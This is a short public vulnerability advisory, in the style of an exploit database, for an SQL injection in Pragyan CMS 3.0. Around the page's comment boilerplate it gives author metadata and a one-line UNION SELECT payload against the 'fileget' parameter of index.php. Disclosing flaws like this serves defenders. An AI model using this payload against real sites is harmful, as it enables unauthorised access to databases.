Pragyan CMS 3.0 SQL Injection Vulnerability

2010.10.25

Credit: Cru3l.b0y

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

                                  In The Name Of GOD

		+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

        +                                                                 +

        +           Pragyan CMS 3.0 SQL Injection Vulnerability           +

        +                                                                 +

        +                     Discovered by Cru3l.b0y                     +

        +                                                                 +

        +                                                                 +

        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] Exploit Title: Pragyan CMS 3.0 SQL Injection Vulnerability

[+] Date: 2010-10-22

[+] Author  : Cru3l.b0y

[+] Software Link: http://switch.dl.sourceforge.net/project/pragyan/pragyan/3.0/pragyanv3.0-alpha.tar.bz2

[+] Version: 3.0

[+] Tested on: Ubuntu 10.10

[+] Contact : Cru3l.b0y@gmail.com

[+] Website : WwW.PenTesters.IR

[+] Greeting: Behzad, Ahmad, Arash, Hosein, Hooshang, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] Exploit :

                 http://target/path/index.php?action=view&fileget=-1'+union+select+@@version,2,3,4,5,6,7--

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Pragyan CMS 3.0 SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.